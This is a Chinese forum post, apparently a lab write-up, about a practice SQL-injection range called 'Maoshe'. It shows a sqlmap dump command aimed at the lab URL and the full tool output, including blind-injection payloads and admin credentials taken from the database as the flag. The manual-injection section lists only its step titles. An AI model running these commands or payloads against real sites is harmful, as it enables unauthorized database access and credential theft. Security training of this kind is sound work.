ToB企服应用市场:ToB评测及商务社交产业平台

标题: 封神台 SQL注入 靶场 (猫舍)手动注入 [打印本页]

作者: 梦应逍遥    时间: 2024-10-13 15:41
标题: 封神台 SQL注入 靶场 (猫舍)手动注入
封神台 SQL注入 靶场 (猫舍)手动注入

靶园地址  http://pu2lh35s.ia.aqlab.cn/?id=1
使用脚本

  1. sqlmapX -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D "maoshe"  --dump  --batch --random-agent
  2.         ___
  3.        __H__
  4. ___ ___["]_____ ___ ___  {1.8#stable}
  5. |_ -| . [.]     | .'| . |
  6. |___|_  [.]_|_|_|__,|  _|
  7.       |_|V...       |_|   https://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting @ 20:46:16 /2024-10-12/
  10. [20:46:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12' from file '/home/kali/tools/SqlmapXPlus/data/txt/user-agents.txt'
  11. [20:46:17] [INFO] resuming back-end DBMS 'mysql'
  12. [20:46:17] [INFO] testing connection to the target URL
  13. sqlmap resumed the following injection point(s) from stored session:
  14. ---
  15. Parameter: id (GET)
  16.     Type: boolean-based blind
  17.     Title: AND boolean-based blind - WHERE or HAVING clause
  18.     Payload: id=1 AND 8425=8425
  19.     Type: time-based blind
  20.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  21.     Payload: id=1 AND (SELECT 3539 FROM (SELECT(SLEEP(5)))tWAV)
  22. ---
  23. [20:46:17] [INFO] the back-end DBMS is MySQL
  24. web server operating system: Windows
  25. web application technology: PHP 5.4.45, Apache 2.4.23
  26. back-end DBMS: MySQL >= 5.0.12
  27. [20:46:17] [INFO] fetching tables for database: 'maoshe'
  28. [20:46:17] [INFO] fetching number of tables for database 'maoshe'
  29. [20:46:17] [INFO] resumed: 4
  30. [20:46:17] [INFO] resumed: admin
  31. [20:46:17] [INFO] resumed: dirs
  32. [20:46:17] [INFO] resumed: news
  33. [20:46:17] [INFO] resumed: xss
  34. [20:46:17] [INFO] fetching columns for table 'admin' in database 'maoshe'
  35. [20:46:17] [INFO] resumed: 3
  36. [20:46:17] [INFO] resumed: Id
  37. [20:46:17] [INFO] resumed: username
  38. [20:46:17] [INFO] resumed: password
  39. [20:46:17] [INFO] fetching entries for table 'admin' in database 'maoshe'
  40. [20:46:17] [INFO] fetching number of entries for table 'admin' in database 'maoshe'
  41. [20:46:17] [INFO] resumed: 2
  42. [20:46:17] [INFO] resumed: 1
  43. [20:46:17] [INFO] resumed: hellohack
  44. [20:46:17] [INFO] resumed: admin
  45. [20:46:17] [INFO] resumed: 2
  46. [20:46:17] [INFO] resumed: zkaqbanban
  47. [20:46:17] [INFO] resumed: ppt
  48. Database: maoshe
  49. Table: admin
  50. [2 entries]
  51. +----+------------+----------+
  52. | Id | password   | username |
  53. +----+------------+----------+
  54. | 1  | hellohack  | admin    | ## 这里已经发现了 flag
  55. | 2  | zkaqbanban | ppt      |
  56. +----+------------+----------+
  57. [20:46:17] [INFO] table 'maoshe.`admin`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/admin.csv'
  58. [20:46:17] [INFO] fetching columns for table 'xss' in database 'maoshe'
  59. [20:46:17] [INFO] resumed: 3
  60. [20:46:17] [INFO] resumed: id
  61. [20:46:17] [INFO] resumed: user
  62. [20:46:17] [INFO] resumed: pass
  63. [20:46:17] [INFO] fetching entries for table 'xss' in database 'maoshe'
  64. [20:46:17] [INFO] fetching number of entries for table 'xss' in database 'maoshe'
  65. [20:46:17] [INFO] resumed: 0
  66. [20:46:17] [WARNING] table 'xss' in database 'maoshe' appears to be empty
  67. Database: maoshe
  68. Table: xss
  69. [0 entries]
  70. +----+------+--------+
  71. | id | pass | user   |
  72. +----+------+--------+
  73. +----+------+--------+
  74. [20:46:17] [INFO] table 'maoshe.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/xss.csv'
  75. [20:46:17] [INFO] fetching columns for table 'news' in database 'maoshe'
  76. [20:46:17] [INFO] resumed: 2
  77. [20:46:17] [INFO] resumed: id
  78. [20:46:17] [INFO] resumed: content
  79. [20:46:17] [INFO] fetching entries for table 'news' in database 'maoshe'
  80. [20:46:17] [INFO] fetching number of entries for table 'news' in database 'maoshe'
  81. [20:46:17] [INFO] resumed: 3
  82. [20:46:17] [INFO] resumed:
  83. [20:46:17] [INFO] resumed: 1
  84. [20:46:17] [INFO] resumed: <h1>
  85. [20:46:17] [INFO] resumed: 2
  86. [20:46:17] [INFO] resumed: <h1>
  87. [20:46:17] [INFO] resumed: 3
  88. Database: maoshe
  89. Table: news
  90. [3 entries]
  91. +----+-----------------------------------------------------------------+
  92. | id | content                                                         |
  93. +----+-----------------------------------------------------------------+
  94. | 1  |  |
  95. | 2  | <h1>                                                            |
  96. | 3  | <h1>                                                            |
  97. +----+-----------------------------------------------------------------+
  98. [20:46:18] [INFO] table 'maoshe.news' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/news.csv'
  99. [20:46:18] [INFO] fetching columns for table 'dirs' in database 'maoshe'
  100. [20:46:18] [INFO] resumed: 1
  101. [20:46:18] [INFO] resumed: paths
  102. [20:46:18] [INFO] fetching entries for table 'dirs' in database 'maoshe'
  103. [20:46:18] [INFO] fetching number of entries for table 'dirs' in database 'maoshe'
  104. [20:46:18] [INFO] resumed: 0
  105. [20:46:18] [WARNING] table 'dirs' in database 'maoshe' appears to be empty
  106. Database: maoshe
  107. Table: dirs
  108. [0 entries]
  109. +-------+
  110. | paths |
  111. +-------+
  112. +-------+
  113. [20:46:18] [INFO] table 'maoshe.dirs' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/dirs.csv'
  114. [20:46:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn'
  115. [*] ending @ 20:46:18 /2024-10-12/
复制代码
手动注入

判断是否存在 SQL注入漏洞

使用 order by 语句 判断数据库字段数

使用联合查询判断回显点

使用回显点 查询相关的数据





结束


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4